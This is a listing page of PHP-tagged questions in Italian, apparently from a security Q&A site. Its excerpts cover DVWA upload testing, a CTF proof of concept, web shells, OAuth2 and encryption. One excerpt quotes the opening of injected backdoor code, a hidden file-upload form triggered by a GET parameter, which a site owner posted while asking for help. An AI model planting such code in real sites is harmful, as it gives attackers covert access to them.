Domande con tag 'php'

domande con tag
1
risposta

Qual è il vantaggio di combinare un modulo con lo script di elaborazione php in una singola pagina utilizzando isset

Vorrei sapere i vantaggi dell'utilizzo di una singola pagina con lo script di elaborazione PHP e il modulo HTML utilizzando isset() anziché utilizzare semplicemente l'azione modulo con il metodo POST su una pagina per chiamare una pagina se...
posta 15.10.2018 - 12:04
0
risposte

Caricamento file DVWA Alto senza altre vulnerabilità

Sono impegnato a realizzare una revisione completa di DVWA per i nostri dipendenti junior. L'alto livello del caricamento dei file non sembra funzionare, tranne se utilizzo il file includi vulnerabilità e carica un'immagine con script php all'in...
posta 12.09.2018 - 16:53
0
risposte

Garbage collection e vulnerabilità

Se sto usando vanilla PHP (v 5.x) stile procedurale , ci sarà la garbage collection? Per quanto ne so GC, è la gestione della memoria per rimuovere un oggetto non utilizzato. Questo mi dice che usare lo stile procedurale PHP (- > non funzion...
posta 07.08.2018 - 15:01
1
risposta

RxR__kyfet.php - Trovato nella directory principale del mio sito. Che cosa fa? [duplicare]

Durante il passaggio nella directory principale del mio sito ho trovato questo file RxR__kyfet.php. Questo è un sito wordpress. Non conosco il php abbastanza bene da dire esattamente quello che fa ma sembra piuttosto sospetto. Ho controllat...
posta 01.08.2018 - 16:09
1
risposta

Il mio sito è stato violato e ha iniettato il codice su index.php e 404.php [duplicato]

Ecco il codice iniettato su index.php if(@isset($_GET[bots])){ echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">'; echo '<input type="file" name="file"><input name="golden"...
posta 08.08.2018 - 11:24
3
risposte

Qualcosa di particolarmente sbagliato nell'inserire un codice di autenticazione nelle e-mail di marketing?

Ho lavorato al mio primo progetto e i miei utenti registrati inizialmente non sono stati particolarmente appiccicosi. Vorrei inviare loro un'email con alcune notizie e informazioni e farle accedere immediatamente quando raggiungono il link di in...
posta 21.08.2018 - 02:52
0
risposte

PoC per vulnerabilità TCPDF

Sto facendo alcune sfide come parte di un CTF interno che stiamo ospitando. Come parte delle sfide, una delle cose che stavo pianificando di dare era File Inclusion usando una vulnerabilità in una certa versione di TCPDF. Stavo cercando...
posta 27.02.2018 - 05:37
1
risposta

Cosa si può fare con la shell Web sul dispositivo Android senza root?

È possibile controllare il dispositivo Android senza root tramite una shell Web? Ho cercato di eseguire varie shell PHP, ma l'intera risposta è una dichiarazione di errore come questa php è installato e tutte le altre pagine php fun...
posta 18.02.2018 - 18:01
0
risposte

Come configurare Oauth2 sul server web dell'utente

Sto scrivendo un plugin per Wordpress che, spero, consentirà all'amministratore di Wordpress di concedere l'accesso al plugin ai propri Google Cal e Contatti e continuare ad accedere a tali servizi anche quando l'amministratore non è collegato a...
posta 05.01.2018 - 07:29
0
risposte

Quale crittografia usare quando l'utente ha bisogno di memorizzare la chiave?

Recentemente sono entrato nelle sfide del codice, fatte dai miei amici, da me o da qualche altra fonte che ha a che fare con la sicurezza. Ora, ho il seguente scenario: <Login form> | | [ Proccess login ] --> (Valid) -...
posta 15.12.2017 - 21:30